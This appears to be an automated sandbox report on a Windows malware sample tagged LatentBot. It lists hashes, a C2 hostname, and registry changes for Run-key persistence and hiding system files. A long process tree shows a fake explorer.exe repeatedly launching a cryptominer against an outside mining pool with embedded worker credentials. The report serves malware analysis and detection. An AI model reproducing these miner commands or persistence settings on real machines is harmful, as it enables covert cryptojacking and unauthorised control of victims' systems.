Analysis
max time kernel: 150s
max time network: 146s
platform: windows11-21h2_x64
resource: win11-20250410-en
resource tags: arch:x64, arch:x86, image:win11-20250410-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 20/04/2025, 05:30
Static task: static1
Behavioral task: behavioral1
Sample: JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource: win10v2004-20250410-en
Behavioral task: behavioral2
Sample: JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource: win11-20250410-en
General
Target: JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Size: 48KB
MD5: c4ad493a6bfd212c4e1418ba605020af
SHA1: 20272ac81bd1df68603924ae3b1fe4c2df034a29
SHA256: 492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
SHA512: 736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf
SSDEEP: 768:/evN/sOhfTEr9IioMKMevN/sOhfTEr9IioMKa:/elEOhrkIwKMelEOhrkIwKa
Malware Config
Extracted
latentbot
superwaffles.zapto.org
Signatures
Latentbot family
Modifies visibility of hidden/system files in Explorer 2 TTPs 64 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Executes dropped EXE 64 IoCs
Adds Run key to start application 2 TTPs 64 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas2⤵PID:6072
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe2⤵PID:2924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5768 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3348
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3288
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5332 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3160
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:6120 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5536 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5252
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:568 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5560
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4816
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1044 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2244
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2812 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1160
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2304 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5508
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2756 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5148
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:6016 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3420 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4240
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5960
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4652 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3912 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4200
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4848 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3168
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1340
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5468 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:6132
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2232
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3636 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5296
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2780
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5860 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5116
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:876 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5240
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5536 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2472
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5816
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:744 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5560
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5252
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1520 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5944
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1448 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2064
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4544 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4868
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:1276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1992 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2516
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3712
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2756
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1004 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5076
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5788 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3420
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1480 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2456
-
-
